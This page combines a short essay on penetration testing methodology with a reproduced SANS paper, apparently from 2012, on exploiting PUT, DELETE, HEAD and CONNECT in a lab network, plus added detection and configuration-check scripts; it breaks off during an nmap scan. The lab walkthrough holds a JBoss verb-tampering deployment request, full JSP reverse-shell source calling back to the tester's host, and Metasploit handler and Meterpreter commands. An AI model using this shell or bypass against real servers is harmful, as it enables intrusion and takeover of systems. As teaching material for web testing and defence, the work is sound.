
Part 1: Penetration Testing Methods (sample essay 118)

Penetration testing has no single standard definition. The common description agreed on by a number of security organizations abroad is that a penetration test is a method of evaluating the security of a computer network system by simulating the attack methods of a malicious hacker. The process includes an active analysis of any weaknesses, technical flaws, or vulnerabilities of the system, carried out from the position an attacker could occupy, and from that position the tester may actively exploit the security vulnerabilities that are found.

A hacker's intrusion relies on the security weaknesses of the target network, and penetration testing works on the same principle: it simulates the methods of a real intrusion, with manual penetration as the main approach and attack tools as a supplement, so that the whole penetration test stays within a range that can be controlled and adjusted.

Common penetration testing methods:

SQL injection, file upload, directory traversal, cross-site scripting (XSS), weak passwords, overflow vulnerabilities, sniffing, denial of service, DNS hijacking, side-site attacks (reaching the target through another site hosted on the same server), and lure-based attacks. This gave me a fresher understanding of penetration testing and of the reasoning behind it.

We consider penetration testing to have two further notable characteristics: it is a gradual process that deepens step by step, and it is carried out with attack methods chosen so as not to disrupt the normal operation of business systems.

Differences from other assessment methods: a conventional assessment starts from known information assets or other evaluation targets and tries to find all related security problems, whereas a penetration test starts from known exploitable vulnerabilities and tries to find whether the corresponding information assets exist. Conventional assessments therefore produce more comprehensive results, while penetration testing focuses on the severity of the vulnerabilities.

Some penetration testers perform the assessment with two different scanners. These tools can at least partly automate the process, so that skilled professionals can concentrate on the issues found. Probing more deeply requires connecting to any suspicious service and, in some cases, exploiting the vulnerability.

Commercial vulnerability scanners have one important problem in practice: if a test does not return a positive answer, many products simply hide the result. For example, one well-known scanner has this flaw: if it cannot log into a Cisco router, or cannot obtain the software version over SNMP, it will not warn that the router may be susceptible to certain denial-of-service (DoS) attacks. If you do not know that the scanner has withheld some information (for instance, that it was unable to test for a given vulnerability), you may wrongly conclude that the network is secure when its actual state may be dangerous.

Besides finding suitable tools and a qualified organization to perform the test, the scope of the test should be defined precisely. Attackers obtain information through social engineering, theft, bribery, or breaking and entering. A real attacker will not be satisfied with attacking a single enterprise network: using that network as a stepping stone to attack other companies is a common hacker tactic, and attackers may even reach the enterprise's ISP this way.

The Open Source Security Testing Methodology Manual (OSSTMM), proposed by Pete Herzog, has become the de facto method for performing penetration tests and establishing a security baseline. In Pete Herzog's words: "The main goal of the OSSTMM is transparency. It provides transparency about those who lack sufficient security configuration and policy. It provides transparency about those who have not performed adequate security and penetration testing. It provides transparency about unscrupulous security vendors who squeeze every last cent from victims whose security budgets are already thin, and about those who sidestep business value and hype threats such as regulation, cyber-vandalism and hackers. The OSSTMM's scope of penetration testing covers the whole risk assessment process, from the initial requirements analysis to the generation of the report." The methodology covers six areas:

- Information security
- Process security
- Internet technology security
- Communications security
- Wireless security
- Physical security

The OSSTMM focuses on the technical details of the test items: what needs to be done before, during and after a security test, and how to interpret the results. New tests addressing international best practice, laws, regulations and ethical issues are added and updated regularly.

The National Institute of Standards and Technology (NIST) discussed penetration testing in Special Publication 800-42, Guideline on Network Security Testing. NIST's approach is less comprehensive than the OSSTMM, but it is more likely to be accepted by management. (SP 800-42 has since been withdrawn and replaced by SP 800-115, Technical Guide to Information Security Testing and Assessment.)

Another aspect to consider is the penetration testing service provider. The biggest worry for every organization during a penetration test is that sensitive information may leak through the wrong channel. It is therefore important to gather as much information as possible about the provider (their technical capability, certifications, experience, methodology, and the tools they use) and to make sure they are professionals. In addition, certain professional certifications indicate how trustworthy a company is and how well it follows industry best practice.


Part 2: Web Application Penetration Testing Based on HTTP Methods

Penetration Testing of a Web Application Using Dangerous HTTP Methods
GIAC GWAPT Gold Certification, SANS Institute InfoSec Reading Room
Author: Issac Museong Kim; Advisor: Dominicus Adriyanto Hindarto; Accepted: 30 April 2012
Copyright 2012 SANS Institute; the author retains full rights. Reposting is not permitted without express written permission.

Abstract

Vulnerability scanner results and web security guides often suggest that dangerous HTTP methods should be disabled. But these guides usually do not describe in detail how to exploit these methods. In the penetration testing of a web application or web server, this type of vulnerability is easy to find, but it is not easy to use when it comes to performing a penetration test against the web application. This paper will describe in detail why these HTTP methods are dangerous and how to use such a method for the penetration test. Finally, it will demonstrate how this method can be used during penetration testing.


1. Introduction

HTTP methods are functions that a web server provides to process a request. For example, the "GET" method is used to retrieve a web page from the server. According to RFC 2616, there are eight HTTP methods for HTTP 1.1, specifically OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, and CONNECT, and this set can be extended. In this section, the functions of the methods are described briefly with an explanation of why some of them are dangerous.

The OPTIONS method is used to request the methods available on a server, while the GET method is used to retrieve the information that is requested. The GET method is one of the most common ways to retrieve web resources. The HEAD method is similar to the GET method, but is used to retrieve only header information. The POST method is used to send a request with the entity enclosed in a body; the response to this request is determined by the server. The PUT method is used to store the enclosed entity on a server, while the DELETE method is used to remove the resource from the server. The TRACE method is employed to return the request that was received by the final recipient from the client so that it can diagnose the communication. Finally, the CONNECT method creates a tunnel with a proxy (Fielding et al., 1999). There are also extended HTTP methods such as Web Distributed Authoring and Versioning (WebDAV). WebDAV can be used by clients to publish web content and involves a number of other HTTP methods such as PROPFIND, MOVE, COPY, LOCK, UNLOCK, and MKCOL (Goland, Whitehead, Faizi, Carter, & Jensen, 1999).

HTTP methods can be used to help developers in the deployment and testing of web applications. On the other hand, when they are configured improperly, these methods can be used for malicious activity (Meucci, Keary, & Cuthbert, 2009). This paper will explain such techniques further by providing a more detailed explanation and a demonstration of their usage.


2. Dangerous Use of HTTP methods

Most of the HTTP methods mentioned above can be utilized to attack a web application. While GET and POST are used in most attacks, the methods themselves are not the problem and are required for a common web server. But the PUT, DELETE, and CONNECT methods are not required by most web servers. It is dangerous to have these methods enabled on a web application because this can significantly impact its security. This section will explain why these methods are dangerous and provide an example of utilizing them to attack a web application.

First, the PUT method can be used to introduce malicious code and shells to the target. If the PUT method is available on a JBOSS web server, it is possible to upload JSP shells that can be used to execute malicious commands on the server (Sutherland, 2011). Moreover, this method can be employed to launch a phishing attack. The attacker can upload an HTML page with hyperlinks that redirect a victim to a malicious website, or a malicious login form that collects the user's confidential information.

Second, the DELETE method can be used to remove important files in the application, causing a denial of service, or to remove access configuration files, such as ".htaccess" on an Apache server, to gain unauthorized access (SANS Institute, 2009).

Third, the CONNECT method can be employed to tunnel peer-to-peer (P2P) traffic over HTTP. Since the network traffic is tunneled, the attacker can hide the contents of the traffic, as well as bypass firewalls or security devices. As a result, "detecting this unauthorized traffic is difficult because it is often hidden in ways that make it almost indistinguishable from normal authorized traffic" (Alman, 2003).

Additionally, the HEAD method is not considered dangerous, but it can be used to attack a web application by mimicking a GET request. For example, a web.xml security constraint that lists only the GET and POST methods (as the JBOSS JMX console's did by default) covers only those two verbs, so a HEAD request sent to the target URL is outside the constraint and still initiates the execution, bypassing the authentication. The penetration tester can actually use different verbs such as TRACE, PUT, DELETE, and any arbitrary string such as HEED (Dabirsiaghi, 2008). More details on how these methods can be employed are given in the next section.
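The abuses described in this section leave traces in ordinary access logs. The following detector is an added example written for this page, not code from the paper; the log lines are constructed for it (Apache common log format, using the paper's lab addresses), and the list of admin path prefixes is an assumption. It flags accepted PUT/DELETE/WebDAV writes, any CONNECT to an origin server, TRACE that succeeds, and verbs other than GET/POST that an admin path accepted, which is the signature of the HEAD verb-tampering trick.

```python
"""Flag dangerous-method use in web server access logs: accepted
PUT/DELETE/WebDAV writes, CONNECT tunnelling, TRACE, and verbs other than
GET/POST accepted on admin paths (verb tampering).  Added example; the log
lines are constructed for it (common log format) and the admin path list is
an assumption."""
import re

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)
WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}
KNOWN_METHODS = {"GET", "POST", "HEAD", "OPTIONS", "PUT", "DELETE", "TRACE", "CONNECT",
                 "PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK", "SEARCH"}
# Assumption: paths where only GET/POST from an authenticated session are legitimate.
ADMIN_PREFIXES = ("/jmx-console/", "/web-console/", "/admin/")


def parse_line(line):
    """Dict of the log fields, or None when the line is not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def classify(entry):
    """Reason string when the entry is suspicious, otherwise None."""
    method, target, status = entry["method"].upper(), entry["target"], entry["status"]
    accepted = 200 <= status < 300          # includes 201 Created and 207 Multi-Status
    if method == "CONNECT":                  # no browser sends CONNECT to an origin server
        return "CONNECT tunnel attempt"
    if method in WRITE_METHODS and accepted:
        return f"{method} accepted: content written or removed"
    if method == "TRACE" and accepted:
        return "TRACE enabled"
    if target.startswith(ADMIN_PREFIXES) and method not in ("GET", "POST") and accepted:
        return f"{method} accepted on admin path (verb tampering)"
    if method not in KNOWN_METHODS:
        return f"non-standard verb {method}"
    return None


def scan(lines):
    """(source, method, target, status, reason) for every suspicious entry."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reason = classify(entry)
        if reason:
            findings.append((entry["src"], entry["method"], entry["target"], entry["status"], reason))
    return findings


# Constructed sample, loosely following the paper's lab addresses.
SAMPLE_LOG = [
    '10.10.10.10 - - [03/Jan/2012:15:04:01 -0800] "OPTIONS / HTTP/1.1" 200 0',
    '10.10.10.10 - - [03/Jan/2012:15:10:22 -0800] "HEAD /jmx-console/HtmlAdaptor?action=invokeOp HTTP/1.1" 200 0',
    '10.10.10.10 - - [03/Jan/2012:15:11:00 -0800] "HEED /jmx-console/HtmlAdaptor HTTP/1.1" 200 0',
    '10.10.10.10 - - [03/Jan/2012:15:12:40 -0800] "GET /browser/browser.jsp HTTP/1.1" 200 4532',
    '192.168.10.10 - - [03/Jan/2012:19:40:05 -0800] "PUT /index.htm HTTP/1.1" 411 0',
    '192.168.10.10 - - [03/Jan/2012:19:40:06 -0800] "DELETE /index.htm HTTP/1.1" 207 0',
    '192.168.10.10 - - [03/Jan/2012:19:40:07 -0800] "PUT /index.htm HTTP/1.1" 201 0',
    '192.168.10.10 - - [03/Jan/2012:19:42:00 -0800] "CONNECT 192.168.65.77:8080 HTTP/1.1" 403 0',
    '10.10.10.1 - - [03/Jan/2012:19:45:00 -0800] "GET /index.html HTTP/1.1" 200 1200',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

The status check matters: a PUT answered with 411 Length Required or 403 Forbidden did nothing, so only 2xx responses are reported for write methods, whereas CONNECT is reported regardless of status because a legitimate client never sends it to a web server.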


3. Penetration Testing Scenarios

We will discuss the use of dangerous HTTP methods during a penetration test. In order to show how and when to use each method, we will cover all steps of a penetration test: reconnaissance, mapping, discovery, and exploitation. Furthermore, there are three phases of testing in the demonstration, and each phase is written up in three steps: reconnaissance, vulnerability discovery, and exploitation. The first phase uses the HEAD method to attack a public web server. The second phase uses the PUT/DELETE methods to attack an intranet server. Finally, the last phase uses the CONNECT method to attack a firewall. Since the purpose of this paper is to demonstrate the usage of dangerous HTTP methods, some general steps such as NMAP scanning are not described extensively.

3.1 The Testing Lab Environment

The lab resembles a company network that has two DMZ networks protected by a firewall. Figure 1 shows the network diagram of the company. This network was built with the VMware team feature, which creates a virtual LAN segment. All three LAN segments are connected by the virtual router/firewall, Vyatta 6.0. Since this is a virtual lab, a private IP address range has been used. The subnet 10.10.10.0/24 has been assigned to the external network; IP address 10.10.10.1 has been reserved for the firewall's external interface and 10.10.10.10 for the penetration tester's laptop. Another subnet, 192.168.10.0/24, has been assigned to the DMZ 1 network; 192.168.10.1 has been reserved for the firewall's DMZ 1 interface and 192.168.10.10 for the public web server. The subnet 192.168.65.0/24 has been assigned to the DMZ 2 network, while 192.168.65.1 has been reserved for the firewall's DMZ 2 interface. Two servers, an intranet web server and a proxy server, are connected to the DMZ 2 network. IP address 192.168.65.10 has been reserved for the intranet web server and 192.168.65.77 for the proxy server.

The firewall restricts access to these networks. A host in the DMZ 1 network is only accessible via TCP port 80 from both the outside and the inside. A host in the DMZ 1 network can access hosts in any other network only through TCP ports 80 and 8080. Hosts in the DMZ 2 network are not accessible from the outside network, but the DMZ 1 network is allowed to access the proxy server via TCP ports 80 and 8080.


Figure 1: Network diagram.

4. Compromising Public Web Server

This section demonstrates how the penetration tester gains access to the public web server by taking advantage of an HTTP method that is enabled on it.

4.1. Reconnaissance

This penetration test is a black box test; the penetration tester does not have any knowledge about the target systems. At this point, the penetration tester only knows the company name and IP address ranges, which are subnet 10.10.10.0/24 and subnet 192.168.10.0/24. First, the penetration tester runs an NMAP scan against these two networks and finds the following information:

- 10.10.10.1: network device with no ports open;
- 192.168.10.10: Windows XP running Tomcat 5.0/JBOSS 4.0 with TCP port 80 open.

Since port 80 is listening on host 192.168.10.10, the penetration tester does a further check and finds out which HTTP methods are enabled on the host. There are several ways to check the enabled methods; the easiest way is by using a telnet command, as shown in Figure 2. The result shows that the host accepts many dangerous HTTP methods such as PUT and DELETE.


telnet 192.168.10.10 80
OPTIONS / HTTP/1.1
Host: 192.168.10.10

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Allow: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS
Content-Length: 0
Date: Tue, 03 Jan 2012 20:07:42 GMT
Server: Apache-Coyote/1.1

Figure 2: Telnet command to check the HTTP methods.

Another method of checking which HTTP methods are enabled is using an NMAP script called http-methods.nse, which can be obtained from http://nmap.org/nsedoc/scripts/http-methods. This script is useful when multiple targets or ports need to be checked (Stroessenreuther, 2009). It also provides more detailed and accurate output than the telnet command because it actually tests the available methods to see if they are allowed, as shown in Figure 3.

nmap --script=http-methods.nse --script-args http-methods.retest=1 192.168.10.0/24

Starting Nmap 5.51 ( http://nmap.org ) at 2012-01-03 15:04
Nmap scan report for 192.168.10.10
Host is up (0.000059s latency).
Not shown: 979 closed ports
PORT   STATE SERVICE
80/tcp open  http
| http-methods: GET HEAD POST PUT DELETE TRACE OPTIONS
| Potentially risky methods: PUT DELETE TRACE
| See http://nmap.org/nsedoc/scripts/http-methods.html
| GET / -> HTTP/1.1 200 OK
| HEAD / -> HTTP/1.1 200 OK
| POST / -> HTTP/1.1 200 OK
| PUT / -> HTTP/1.1 403 Forbidden
| DELETE / -> HTTP/1.1 403 Forbidden
| TRACE / -> HTTP/1.1 403 TRACE method is not allowed
|_OPTIONS / -> HTTP/1.1 200 OK
MAC Address: 00:0C:29:0D:52:E6 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 15.78 seconds


Figure 3: NMAP http-methods.nse check for the HTTP method.
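Figure 3 makes a point worth automating: the Allow header returned to OPTIONS lists PUT and DELETE, yet the server answers an actual PUT or DELETE on "/" with 403, so the header is advisory and each method has to be re-sent, which is what http-methods.retest=1 does. The script below is an added example written for this page, not code from the paper or from nmap. It parses an OPTIONS response, classifies the advertised methods, and can re-test each one against a live host; the embedded response is constructed from the headers in Figure 2 so the parser runs offline, and the risky-method list and default host are assumptions.

```python
"""OPTIONS probe and risky-method classification, the check that Figure 2
(telnet) and Figure 3 (nmap http-methods) perform.  Added example, not code
from the paper; the risky-method list, default host and path are assumptions."""
import socket

# Methods to flag, modelled on nmap's "Potentially risky methods" line plus
# the WebDAV verbs the paper later meets on the intranet server.
RISKY_METHODS = {
    "PUT", "DELETE", "TRACE", "CONNECT",
    "COPY", "MOVE", "PROPFIND", "PROPPATCH", "SEARCH", "MKCOL", "LOCK", "UNLOCK",
}


def build_request(method, path="/", host="192.168.10.10", body=b""):
    """Raw HTTP/1.1 request; Content-Length is added only when a body is sent."""
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}", "Connection: close"]
    if body:
        lines.append(f"Content-Length: {len(body)}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii") + body


def parse_response(raw):
    """(status_code, reason, headers) from a raw response; header names are
    lower-cased and repeated headers are joined with ', '."""
    head = raw.partition(b"\r\n\r\n")[0].decode("iso-8859-1")
    lines = head.split("\r\n")
    parts = lines[0].split(" ", 2)
    code = int(parts[1])
    reason = parts[2] if len(parts) > 2 else ""
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        headers[name] = f"{headers[name]}, {value}" if name in headers else value
    return code, reason, headers


def allowed_methods(headers):
    """Methods advertised by Allow (or the older Public header nmap also reads)."""
    raw = headers.get("allow") or headers.get("public") or ""
    return [m.strip().upper() for m in raw.split(",") if m.strip()]


def risky_methods(methods):
    """Sorted subset of `methods` that should be disabled unless needed."""
    return sorted(set(methods) & RISKY_METHODS)


def _exchange(host, port, request, timeout):
    """Send one request and read until the server closes (or the timeout elapses)."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        try:
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
    return parse_response(b"".join(chunks))


def probe(host, port=80, path="/", timeout=5.0):
    """Live check (needs network): send OPTIONS, then re-send every advertised
    method the way http-methods.retest=1 does, because Allow is only advisory.
    Returns {method: (status_code, reason)}."""
    _, _, headers = _exchange(host, port, build_request("OPTIONS", path, host), timeout)
    results = {}
    for method in allowed_methods(headers):
        code, reason, _ = _exchange(host, port, build_request(method, path, host), timeout)
        results[method] = (code, reason)
    return results


# Constructed offline input: the response headers shown in Figure 2.
FIGURE2_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)\r\n"
    b"Allow: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS\r\n"
    b"Content-Length: 0\r\n"
    b"Date: Tue, 03 Jan 2012 20:07:42 GMT\r\n"
    b"Server: Apache-Coyote/1.1\r\n\r\n"
)

if __name__ == "__main__":
    code, reason, headers = parse_response(FIGURE2_RESPONSE)
    methods = allowed_methods(headers)
    print(code, reason, "Allow:", methods)
    print("Potentially risky methods:", risky_methods(methods))
```

Run `probe("192.168.10.10")` against the lab host to get the per-method verdicts of Figure 3; a 403 on PUT for "/" does not rule out PUT on other paths, so re-test against the directories you actually care about.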

Lastly, there is a Firefox plug-in called RESTClient that can be obtained from https:///en-US/firefox/addon/restclient/. This plug-in allows testers to exercise RESTful/WebDAV services through a GUI (Zhou, 2011). To use this plug-in, the penetration tester selects the "OPTIONS" method, inserts the URL of the target web application, and then clicks the "Send" button. As shown in Figure 4, the result is displayed in the Response Header tab.

Figure 4: RESTClient Firefox plug-in screenshot.

4.2. Vulnerability Discovery

At this point, the penetration tester knows that TCP port 80 is listening on host 192.168.10.10, which runs JBOSS 4.0, as well as which HTTP methods are enabled on that host. The penetration tester determines that the JBOSS interface is accessible on this server, as shown in Figure 5. Thus, the penetration tester researches JBOSS version 4.0 on the internet and finds out that it has a vulnerability that allows an unauthorized JSP shell deployment to the web server. Using this shell, the attacker may be able to take control of the web server. This vulnerability can be exploited by using the default console login, the HTTP verb tampering technique, or the HTTP PUT method (Sutherland, 2011).

Figure 5: JBOSS interface screenshot.

Default console login allows the hacker to log into the JBOSS JMX console with the default login credentials, while the HTTP verb tampering technique uses the HTTP HEAD method to bypass the authentication of the JBOSS framework; a detailed explanation of this will be provided in the discussion of the exploitation phase. The HTTP PUT method can be enabled on the JBOSS framework, allowing a JSP shell to be uploaded.

4.3. Exploitation

In this exploitation phase, the penetration tester tries to log into the JBOSS JMX console, but the console is password protected, as shown in Figure 5, and the default username and password do not work. Thus, the penetration tester decides to use the next method, which is the HTTP verb tampering technique (Dabirsiaghi, 2008). This technique utilizes the deployment function of the JBOSS framework. The function can be executed by requesting an associated URL with the HEAD method instead of the GET or POST method. The request can bypass authentication because the JBOSS framework only checks the GET and POST methods by default.

To carry out HTTP verb tampering, the penetration tester first uploads the "browser.war" file to server 10.10.10.10, which is owned by the penetration tester. The browser.war file is a web archive (WAR) file that contains a JSP shell (Vonloesch, 2006). Once this WAR file is deployed to the JBOSS framework, the JSP shell becomes available on the target web server under the file name "browser.jsp." Next, the penetration tester needs to determine which URL will be used to bypass the authentication. Thus, the penetration tester installs JBOSS 4.0.0 on the server and learns how to deploy a WAR file by intercepting the request with the Burp Suite proxy tool, as shown in Figure 6. Then, the penetration tester creates an HTTP request URL based on this information, as shown in Figure 7.

GET /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL&methodIndex=6&arg0=http%3A%2F%2F10.10.10.10%2Fbrowser.war HTTP/1.1

Figure 6: Burp proxy request interception while deploying the browser.war file.

http://192.168.10.10/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL&methodIndex=6&arg0=http%3A%2F%2F10.10.10.10%2Fbrowser.war

Figure 7: Deployment of the browser.war file.

As a next step, the penetration tester sends the request using the HEAD method to the server 192.168.10.10, as shown in Figure 8, using Burp Suite's Repeater function, and obtains an HTTP 200 OK response, which means that the request was successful. The penetration tester then browses the http://192.168.10.10/browser/browser.jsp page; Figure 9 shows that the shell is deployed successfully.


Figure 8: Deployment of the browser.war file using the HEAD method.

Figure 9: Access to the browser.jsp page.
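Why the HEAD request of Figure 8 is answered without authentication comes down to how a servlet container matches a `<security-constraint>`: when a `<web-resource-collection>` enumerates `<http-method>` elements, the constraint applies to those verbs only, and every other verb (HEAD, TRACE, or the made-up HEED of section 2) reaches the servlet unchallenged. The model below is an added example written for this page, not JBoss or paper code. The two web.xml fragments are assumptions written to resemble the JMX console constraint the paper describes; the "fixed" one lists no `<http-method>` at all, which makes the constraint cover every verb.

```python
"""Model of Servlet-spec security-constraint matching, showing why a
constraint naming only GET and POST lets HEAD (and arbitrary verbs) through
(sections 2 and 4.3) and what the fixed constraint looks like.  Added example;
the web.xml fragments and the context-relative path are assumptions."""
import xml.etree.ElementTree as ET

# Constraint of the kind the paper describes: only GET and POST are listed,
# so every other verb is outside the constraint.  (Assumed fragment.)
WEAK_WEB_XML = """<web-app>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HtmlAdaptor</web-resource-name>
      <url-pattern>/*</url-pattern>
      <http-method>GET</http-method>
      <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint><role-name>JBossAdmin</role-name></auth-constraint>
  </security-constraint>
</web-app>"""

# Fix: no <http-method> element, so the constraint applies to all methods.
FIXED_WEB_XML = """<web-app>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HtmlAdaptor</web-resource-name>
      <url-pattern>/*</url-pattern>
    </web-resource-collection>
    <auth-constraint><role-name>JBossAdmin</role-name></auth-constraint>
  </security-constraint>
</web-app>"""


def parse_constraints(web_xml):
    """List of (url_patterns, http_methods) per <web-resource-collection>;
    an empty method list means the collection applies to every method."""
    root = ET.fromstring(web_xml)
    out = []
    for sc in root.findall("security-constraint"):
        for wrc in sc.findall("web-resource-collection"):
            patterns = [p.text.strip() for p in wrc.findall("url-pattern")]
            methods = [m.text.strip().upper() for m in wrc.findall("http-method")]
            out.append((patterns, methods))
    return out


def pattern_matches(pattern, path):
    """Servlet url-pattern rules: path prefix '/x/*', extension '*.ext', else exact."""
    if pattern.endswith("/*"):
        prefix = pattern[:-2]
        return path == prefix or path.startswith(prefix + "/")
    if pattern.startswith("*."):
        return path.endswith(pattern[1:])
    return path == pattern


def is_protected(web_xml, method, path):
    """True when some constraint covers (method, path), so the container
    enforces the auth-constraint before the servlet runs."""
    for patterns, methods in parse_constraints(web_xml):
        if any(pattern_matches(p, path) for p in patterns) and (not methods or method.upper() in methods):
            return True
    return False


def bypass_verbs(web_xml, path, candidates=("GET", "POST", "HEAD", "PUT", "DELETE", "TRACE", "HEED")):
    """Verbs that reach `path` without hitting any constraint."""
    return [v for v in candidates if not is_protected(web_xml, v, path)]


def head_request(url_path, host="192.168.10.10"):
    """The verb-tampered request of Figure 8: the deployment URL sent with HEAD."""
    return f"HEAD {url_path} HTTP/1.1\r\nHost: {host}\r\n\r\n".encode("ascii")


if __name__ == "__main__":
    path = "/HtmlAdaptor"  # context-relative path of the JMX console servlet (assumed)
    print("weak  web.xml, unprotected verbs:", bypass_verbs(WEAK_WEB_XML, path))
    print("fixed web.xml, unprotected verbs:", bypass_verbs(FIXED_WEB_XML, path))
```

Servlet 3.0 added `<http-method-omission>` for the case where a few verbs must be exempted, and Servlet 3.1 added `<deny-uncovered-http-methods/>` so that any verb not named in a constraint is rejected outright; on a container that predates those, dropping the `<http-method>` elements, as in the fixed fragment, is the correct repair.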

Now, the penetration tester accesses the shell through the web browser. Using this shell, the penetration tester can create a file, delete a file, or browse the file system of the web server. However, the penetration tester wants full access to the server in order to use it as a pivot system to attack other systems. The penetration tester determines that the firewall blocks any incoming request to the web server other than TCP port 80, and therefore plans to set up a reverse shell. To do this, the penetration tester creates another JSP file that connects back to the penetration tester's server, 10.10.10.10, via TCP port 80, with the Metasploit framework, as illustrated in Figure 10 (Sutherland, 2011). Figure 11 shows the contents of the "cmd.jsp" file that is created.

ruby c:\metasploit\msf3\msfpayload java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=80 R > cmd.jsp

Figure 10: Creating the cmd.jsp file.

<%@page import="java.io.*,java.net.*"%>
<%
  // StreamConnector copies one stream into another until EOF
  // (msfpayload java/jsp_shell_reverse_tcp template).
  class StreamConnector extends Thread {
    InputStream is;
    OutputStream os;
    StreamConnector( InputStream is, OutputStream os ) { this.is = is; this.os = os; }
    public void run() {
      BufferedReader in = null;
      BufferedWriter out = null;
      try {
        in = new BufferedReader( new InputStreamReader( this.is ) );
        out = new BufferedWriter( new OutputStreamWriter( this.os ) );
        char buffer[] = new char[8192];
        int length;
        while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 ) {
          out.write( buffer, 0, length );
          out.flush();
        }
      } catch( Exception e ){}
      try {
        if( in != null ) in.close();
        if( out != null ) out.close();
      } catch( Exception e ){}
    }
  }
  // Connect back to the tester's listener on 10.10.10.10:80 and wire
  // cmd.exe's stdout/stdin to the socket in both directions.
  try {
    Socket socket = new Socket( "10.10.10.10", 80 );
    Process process = Runtime.getRuntime().exec( "cmd.exe" );
    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
  } catch( Exception e ) {}
%>

Figure 11: Contents of the cmd.jsp file.

In the next step, the penetration tester uploads the cmd.jsp page to the web server using the upload feature of the browser.jsp shell, and confirms that the cmd.jsp page is accessible from http://192.168.10.10/browser/cmd.jsp. The penetration tester then sets up the reverse shell listener on his or her own server, as shown in Figure 12, with a Metasploit console (Sutherland, 2011).

msf > use exploit/multi/handler
msf exploit(handler) > setg LHOST 10.10.10.10
LHOST => 10.10.10.10
msf exploit(handler) > setg LPORT 80
LPORT => 80
msf exploit(handler) > setg PAYLOAD java/jsp_shell_reverse_tcp
PAYLOAD => java/jsp_shell_reverse_tcp
msf exploit(handler) > setg SHELL cmd.exe
SHELL => cmd.exe
msf exploit(handler) > exploit -j -z

Figure 12: Setting up the reverse shell listener.

After the penetration tester accesses the cmd.jsp page, which triggers the reverse shell connection from the web server, the Metasploit console shows that the session has been created, as illustrated in Figure 13. The penetration tester then upgrades the shell to a Meterpreter shell for more privileges and opens a VNC shell for GUI access to the server, as shown in Figure 14. The penetration tester also runs the "getuid" command from the Meterpreter shell and determines that system access has been achieved. The penetration tester now has system access to the server with both Meterpreter and VNC sessions open.


[*] Started reverse handler on 10.10.10.10:80
[*] Starting the payload handler...
[*] Command shell session 4 opened (10.10.10.10:80 -> 10.10.10.1:11914)
[*] Session 4 created in the background.

Figure 13: Reverse shell connected.

msf exploit(handler) > sessions -u 4
[*] Command Stager progress - 1.66% done (1699/102108 bytes)
[*] Command Stager progress - 100.00% done (102108/102108 bytes)
[*] Sending stage (752128 bytes) to 10.10.10.1
[*] Meterpreter session 5 opened (10.10.10.10:80 -> 10.10.10.1:11915) at 2012-01-03 19:47:25 -0800
msf exploit(handler) > sessions -i 5
[*] Starting interaction with 5...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run vnc.rb
[*] Creating a VNC reverse tcp stager: LHOST=10.10.10.10 LPORT=8080)
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\DOCUME~1\iamissac\LOCALS~1\Temp\CIttLogWwI.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 10.10.10.10:8080...

Figure 14: Upgrade to the Meterpreter and VNC shells.

5. Attacking Internal Server

This section demonstrates how the penetration tester attacks the internal server from the public web server by taking advantage of an HTTP method that is enabled on the internal server.

5.1. Reconnaissance

Once the penetration tester has system access to the public web server, he downloads the necessary tools, such as NMAP and RESTClient, through the existing Meterpreter session in order to gather more information, as shown in Figure 15. Then he scans network 192.168.10.0/24 but finds no other host. When he checks the proxy setting on the public web server, he finds that the public web server uses a proxy server whose IP address is 192.168.65.77.


[*] uploading  : tools.zip -> c:\windows\system32
[*] uploaded   : tools.zip -> c:\windows\system32\tools.zip

Figure 15: Using the Meterpreter session to upload tools.

5.2. Vulnerability Discovery

Based on the previous reconnaissance phase, the penetration tester decides to scan network 192.168.65.0/24 using NMAP with the http-methods NSE script enabled, as shown in Figure 16. NMAP shows that host 192.168.65.10 and host 192.168.65.77 are active and reachable. NMAP also shows that a web service is running on host 192.168.65.10 and that this server accepts dangerous HTTP methods.

192.168.65.0/24

Nmap scan report for 192.168.65.10
Not shown: 993 closed ports
PORT   STATE SERVICE
80/tcp open  http
